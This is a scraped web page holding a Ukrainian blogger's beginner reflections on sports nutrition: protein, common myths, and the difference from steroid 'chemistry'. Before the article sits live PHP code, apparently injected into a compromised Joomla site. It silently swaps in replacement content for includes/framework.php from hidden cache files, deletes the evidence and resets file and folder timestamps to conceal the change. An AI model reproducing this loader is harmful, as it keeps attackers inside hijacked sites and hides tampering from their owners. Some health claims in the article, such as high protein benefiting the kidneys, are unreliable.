$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Спортивне харчування - роздуми початківця. | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

Спортивне харчування - роздуми початківця.

З недавніх пір я почав займатися заняттями по фітнесу… Причиною стали мої улюблені джинси які просто не захотіли застьобуватись, косі погляди моєї дівчини на «місце для пива» та бридкий вигляд моєї «тушки» на фото з останнього походу в сауну. Мета моїх занять - поліпшити свою фігуру і здоров'я. Почав я займатися з початку цього року. Після трьох місяців зацікавився питанням - як мені може допомогти спортивне харчування у досягненні максимального ефекту.  
У цій статті я хочу поділитися своїм досвідом і спостереженнями з цього питання при цьому врахую особливості українського ринку спортивного харчування.


У мене, як і багатьох людей, мало пов'язаних з професійним спортом є безліч забобонів і пліток щодо спортивного харчування. Думаю багато хто чув чутки і плітки, упередження пов'язані з цим питанням. Мені стало цікаве це питання не для мети подальшого споживання спортивного харчування, а для того, щоб орієнтуватися в цьому питанні і розуміти мету і методики застосування, і всі можливі наслідки використання спортивного харчування. Міфів дійсно просто безліч, звичайно джерелом цих міфів є люди, мало розуміються на цьому питанні і не займаються не те що спортом, але і простою зарядкою вранці.

Почну з розповіді, що ж таке спортивне харчування. Спортивне харчування - це натуральні продукти харчування представлені в сильно концентрованому вигляді, в якому виключені всі зайві речовини. Тобто це ті ж продукти, з якими ми стикаємося на кухні кожен день, але оброблені за спеціальними сучасними технологіями. Найчастіше спортивне харчування представлено у вигляді капсул, що містять у собі розчинний у соку порошок. Порошок є похідним - овочів, м'яса, фруктів, молока.

Спортивне харчування застосовувати краще завжди спільно з фізичними вправами. Застосування препаратів і активна фізичне навантаження допоможе максимально швидко набрати м'язову масу, розігнати жирок. Я проводив опитування людей що займаються в кількох з тренажерних залах міста Львова з метою дізнатися які цілі переслідуються, вживаючи спортивне харчування та займаючись активно тренуваннями:


1. Отримати струнке тіло
2. Приваблива фігура
3. Успіх у протилежної статі
4. Участь у змаганнях і конкурсах
5. Просто провести з користю вільний час.


Одним з найбільш поширених елементів у спортивному харчуванні  є протеїн. І це не дивно, адже протеїн це речовина яка фактично являється  білком рослинного або тваринного походження. Для спортсменів і просто людей, які бажають наростити м'язи краще всього підходить суцільномолочний або сивороточнии білок. Плюси такого протеїну є його легка засвоюваність і позитивний ефект для зростання м'язової маси. Саме молоко і сивороточний білок є самим часто використовуваним продуктом, використовуваним при створенні спортивного харчування.

Запитуючи, думки простих людей найчастіше чув - що спортивне харчування  завдає шкоди і збитків здоров'ю - серце, печінка, нирки. Насправді ж, кажу як лікар стоматолог за освітою, це далеко не так. Велика кількість білків у раціоні щодобовому не приносить жодної шкоди організму. Навіть навпаки це сприяє нормальній життєдіяльності організму, позитивно впливаючи на здоров'я нирок, артеріальний тиск і здоров'я печінки. Що не можна сказати про жири і інші баластні речовин в їжі. Але як не дивно люди не замислюються про негативний вплив жиру і  надлишкового холестерину. Для справки зауважу, що здоровий організм людини засвоює за один прийом їжі приблизно 35-45 грам білка, решта не засвоюється.

І природно як українець мені стало цікаво, де можна придбати спортивне харчування в Україні. Серед всіх пропозицій мене зацікавили кілька Інтернет-магазинів, в яких можна знайти широкий асортимент товарів спортивного харчування.

Окремо хочеться сказати про фармакологію, чи як її називають «хімію». До спортивного харчування вона як правило не має відношення, і плутати ці різні поняття не варто. Для прикладу як лікар (хай навіть і стоматолог) скажу: два підходи до простуди: мед, малина, і гірчичники або антибіотики, анальгетики і т.д. Приблизно так і співвідносяться фармакологія і натуральне спортивне харчування. Хоча «хімія» і «гарантує» миттєвий результат, але мені особисто достатньо було почитати інструкцію до одного з таких препаратів (особливо розділ побічні ефекти і протипоказання) щоб мене «ковбасило» пів дня від уявлених мною  (а уява в мене буйна) наслідків для здоров’я.


Вживати чи ні спортивне харчування це особиста справа кожного. Звичайно, як і у будь-якого препарату є негативні сторони, але найчастіше вони виникають від безграмотного застосування. Багато хто помилково вважає що, вживаючи жироспалювачі можна лежати до верху попою на ліжку, і дупа буде танути на очах. Я в даний момент займаюся регулярними тренуваннями не вживаючи препарати. Дякую вам за приділений час на прочитання, буде цікаво почути вашу думку з цього питання.


 
Спортивне харчування Спортивне харчування - роздуми початківця.